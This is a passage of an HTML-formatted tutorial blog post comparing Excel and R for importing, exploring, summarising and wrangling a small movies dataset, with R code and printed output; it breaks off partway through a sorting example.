&lt;h3 id="loading-the-data-sets"&gt;Loading the data sets&lt;/h3&gt;
&lt;h4 id="excel"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The data import steps in Excel are quite straightforward to a day-to-day
Excel user, however, it is certainly not reproducible.&lt;/p&gt;
&lt;p&gt;Steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Click the Data tab on the Ribbon&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Click the Get Data button&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Select From File&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Select from TEXT/CSV&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Select the file and click Import&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Click Load&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id="r"&gt;R&lt;/h4&gt;
&lt;p&gt;There are various ways to import data sets such as local files, online
datasets and even through database connections. We will use the
&lt;code&gt;read_csv()&lt;/code&gt; function from the {readr} package to import our csv files.
But first, what are packages? R packages are a collection of R
functions, compiled code and sample data that can be installed by R
users. Before using an R function such as &lt;code&gt;read_csv()&lt;/code&gt; to import the
data, we are required to install and load the {readr} package. Packages
are great because rather than having to have a huge programme containing
everything you could possibly need, the different packages specialise in
different things, and can be loaded in as and when you need them, saving
a lot of space.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Installing the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Loading the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Importing the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/blog/comparing-r-excel-data-wrangling/movies.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="exploring-our-data"&gt;Exploring our data&lt;/h3&gt;
&lt;p&gt;Before getting started with any data manipulation, let’s explore our
data.&lt;/p&gt;
&lt;h4 id="excel-1"&gt;Excel&lt;/h4&gt;
&lt;p&gt;Excel has one basic data structure, which is the cell. These Excel cells
are extremely flexible as they store data of various types (numeric,
logical and characters). To obtain an overview of the data we could
simply just scroll through the Excel data sheet. Now, let’s imagine a
data set of 1 million rows and 200 columns, would it still be as easy to
scroll through the data sheet to obtain an overview of data? Could we
quickly and reliably view all the column names? To me, manually
scrolling seems like a very time consuming, unreliable and messy
process.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/the_data.png" alt="Screenshot of the data in an Excel spreadsheet." style="width: 400px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h4 id="r-1"&gt;R&lt;/h4&gt;
&lt;p&gt;To view our data in R, we could simply click on it in the environment or
we could call the name of the data set in the script. If we are working
with a large data set, we can also view a subset of this data by using
functions like &lt;code&gt;head()&lt;/code&gt; and &lt;code&gt;tail()&lt;/code&gt;. We could also use the &lt;code&gt;colnames()&lt;/code&gt;
function to programmatically display the variable names within our data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit Number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2012 150 2 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2013 300 4 4000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 2013 130 2 4020&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 22 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str&lt;/span&gt;(movies_data) &lt;span style="color:#8b949e;font-style:italic"&gt;# Displays the structure of the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## spc_tbl_ [26 × 5] (S3: spec_tbl_df/tbl_df/tbl/data.frame)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ Country : chr [1:26] &amp;#34;England&amp;#34; &amp;#34;America&amp;#34; &amp;#34;America&amp;#34; &amp;#34;England&amp;#34; ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ Year : num [1:26] 2011 2012 2013 2013 2013 ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ Highest_profit: num [1:26] 100 150 300 130 177 350 700 650 230 440 ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ Number_movies : num [1:26] 3 2 4 2 3 1 6 2 1 3 ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ no_employees : num [1:26] 1500 2000 4000 4020 5300 3150 6000 5000 1420 5000 ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## - attr(*, &amp;#34;spec&amp;#34;)=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. cols(&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. Country = col_character(),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. Year = col_double(),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. Highest_profit = col_double(),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. Number_movies = col_double(),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. no_employees = col_double()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. )&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## - attr(*, &amp;#34;problems&amp;#34;)=&amp;lt;externalptr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(movies_data) &lt;span style="color:#8b949e;font-style:italic"&gt;# Displays the first six rows of the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit Number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2012 150 2 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2013 300 4 4000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 2013 130 2 4020&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 2 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tail&lt;/span&gt;(movies_data) &lt;span style="color:#8b949e;font-style:italic"&gt;# Displays the last six rows of data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit Number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2021 120 1 1325&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2021 800 3 6800&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2022 400 2 7200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 China 2021 230 2 3101&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 2 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;colnames&lt;/span&gt;(movies_data) &lt;span style="color:#8b949e;font-style:italic"&gt;# Displays all the variable names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Country&amp;#34; &amp;#34;Year&amp;#34; &amp;#34;Highest_profit&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [4] &amp;#34;Number_movies&amp;#34; &amp;#34;no_employees&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;movies&lt;/code&gt; data is comprised of five columns: country, year, highest
profit gained per movie, number of movies produced and number of
employees on set during production. It is clear that R programmatically
displays the output of our data whereas Excel requires of a lot of
eye-balling and manual scrolling. If we were interested in displaying a
subset of our data, in a report for example, using R we could simply use
the functions above. To do this in Excel we would have to copy and paste
the first 6 rows of the data and manually add it to the report document.&lt;/p&gt;
&lt;h3 id="summary-statistics"&gt;Summary Statistics&lt;/h3&gt;
&lt;p&gt;Now, let’s apply some summary statistics on our data. Summary statistics
provide a quick summary of data and are particularly useful for
comparing one project to another, or before and after.&lt;/p&gt;
&lt;h4 id="excel-2"&gt;Excel&lt;/h4&gt;
&lt;p&gt;It is very well known that Excel has a data storage limitation per
spreadsheet. It can have a very limited amount of columns and rows,
while R is made to handle larger data sets. Excel files are also known
to crash when they exceed 20 tabs of data. Excel is able to handle a
good chunk of data, but not much. This becomes very risky when you
unknowingly start to lose data because the file has become too big and
is unable to save. To generate summary statistics (such as the minimum
and maximum values) of our data in Excel, we followed a few steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Scroll to the Home tab&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In the Editing group, click the arrow next to &lt;em&gt;AutoSum&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Click Min&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Click Max&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Press Enter&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These steps were quite easy to follow, however, I often forget where to
click or which tab to select. After discussing this workflow with a
colleague, we also discovered slight differences in the steps for
different versions of Excel. This did not seem very effective or
reproducible to us.&lt;/p&gt;
&lt;h4 id="r-2"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;summary&lt;/span&gt;(movies_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Length:26 Min. :2011 Min. : 11 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Class :character 1st Qu.:2013 1st Qu.:157 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Mode :character Median :2017 Median :320 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Mean :2017 Mean :350 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3rd Qu.:2021 3rd Qu.:485 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Max. :2022 Max. :800 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Number_movies no_employees &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Min. :1.00 Min. :1325 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1st Qu.:2.00 1st Qu.:2275 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Median :2.50 Median :4401 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Mean :2.65 Mean :4338 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3rd Qu.:3.00 3rd Qu.:6375 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Max. :6.00 Max. :7200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Stardard deviation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sd&lt;/span&gt;(movies_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Highest_profit)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 224&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Highest value of the Highest profit column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;min&lt;/span&gt;(movies_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Highest_profit)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Highest value of the Highest profit column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(movies_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Highest_profit)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 800&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The dollar symbol, &lt;code&gt;$&lt;/code&gt;, used here simply dictates which data set and
column we are using for the analysis. It is evident that the source code
of R can be used repeatedly and with different data sets in ways that
Excel formulas cannot. R clearly shows the code (instructions), data and
columns used for an analysis in ways that Excel does not. If I were to
share this script with a colleague they would have a complete
understanding on how the summary statistics were generated because of
R’s human readable syntax.&lt;/p&gt;
&lt;h3 id="data-wrangling"&gt;Data Wrangling&lt;/h3&gt;
&lt;p&gt;Data manipulation tools assist us with modifying our data to make it
easier to read and organise. For example, one of the easiest data
manipulation tools in Excel is inserting columns and rows. The purpose
of data manipulation is to create a consistent, organised and clean data
set. With this in mind, let’s apply the following data manipulations in
Excel and then R:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Rename the columns into a consistent format&lt;/li&gt;
&lt;li&gt;Arrange the year column in ascending order&lt;/li&gt;
&lt;li&gt;Select and create a new column&lt;/li&gt;
&lt;li&gt;Remove a column from the data&lt;/li&gt;
&lt;li&gt;Select only the entries for the year 2014&lt;/li&gt;
&lt;li&gt;Remove only the entries from rows 4-11&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id="1-renaming-columns-in-r-and-excel"&gt;1. Renaming columns in R and Excel&lt;/h4&gt;
&lt;h4 id="excel-3"&gt;Excel&lt;/h4&gt;
&lt;p&gt;Renaming columns in R is a completely manual process, which makes it an
extremely time-consuming and risky process especially if you are working
between multiple messy Excel sheets.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif displaying the manual process of renaming columns in\nexcel." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/renaming_excel.gif" width="600"&gt;&lt;/p&gt;
&lt;h4 id="r-3"&gt;R&lt;/h4&gt;
&lt;p&gt;For data manipulation in R, we use a powerful package in R called
{dplyr}. Let’s load and install the package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Installing the packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To rename the columns, there is a handy function called &lt;code&gt;rename()&lt;/code&gt;. We
simply pass this function the name of our data set (&lt;code&gt;movies_data&lt;/code&gt;), and
then rename each of the columns. There are other methods available in
other packages which can automatically make everything lower case, for
example, but for the purposes of this blog, we will stick with {dplyr}.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Renaming the column into a consistent format&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename_with&lt;/span&gt;(movies_data, tolower)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="2-arrange-the-year-column-in-ascending-order"&gt;2. Arrange the year column in ascending order&lt;/h4&gt;
&lt;h4 id="excel-4"&gt;Excel&lt;/h4&gt;
&lt;p&gt;To change column to ascending order, we first had to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Select the &lt;code&gt;year&lt;/code&gt; column&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Direct to the &lt;code&gt;Sort and Filter tab&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Select the option to sort from the largest to the smallest value&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/sort_data.png" alt="A screenshot of the Excel Tab used to sort the data accordingly" style="width: 400px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h4 id="r-4"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(movies_data, year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country year highest_profit number_movies no_employees&lt;/span&gt;
